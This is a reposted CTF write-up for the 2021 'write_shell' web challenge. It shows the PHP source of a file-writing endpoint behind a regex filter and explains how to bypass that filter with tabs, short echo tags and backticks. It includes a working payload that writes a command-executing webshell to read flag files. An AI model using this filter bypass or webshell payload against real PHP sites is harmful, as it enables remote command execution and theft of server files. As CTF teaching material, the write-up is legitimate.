红明谷CTF 2021||Web||write_shell

本文转载自查看原文 2021-05-14 20:29 1003

环境：[红明谷CTF 2021]write_shell

打开即是源码，那就直接开审吧

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
    if(is_array($input)){
        foreach($input as $key=>$output){
            $input[$key] = waf($output);
        }
    }else{
        $input = check($input);
    }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

可以看到，action为pwd时，会打印当前的目录路径；action为upload时，会上传数据到目录路径下的index.php中，并且会对上传的数据进行检查

在check函数中可以看到，输入的数据不可以包含 ‘ ’，'_', 'php', 'eval', '{', '}' 没过滤反引号，欸嘿，突破口找到了

先看看当前文件路径

?action=pwd

PHP过滤的各种绕过姿势，可以参考：https://xz.aliyun.com/t/8107#toc-11

想要绕过check函数写shell，过滤了空格‘ ’可以用 \t 代替,过滤了'php'可以用短标签<?=?>代替，相当于<? echo>;

过滤了‘_’可以用<?=``?>代替，反引号在php中有执行命令的效果

利用通配符 '*' 模糊搜索目录下的文件

shell:

?action=upload&data=<?=`cat\t/*`?>

写入后直接访问路径下的index.php便会执行我们upload的php命令语句，最终会执行<?=`cat /*`?>,读取目录下包含flag的文件

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 “红明谷”杯数据安全大赛技能场景赛部分wp 长安杯ctf2021web 长城杯ctf2021web复盘 NEEPU-CTF 2021 Web后四题Writeup 洛谷P1064 金明的预算方案 ctf-web-已获shell，通过路径遍历提权-思路笔记 De1ctf - shell shell shell记录 CTF show-web4 ctf之WEB练习一 ctf之WEB练习二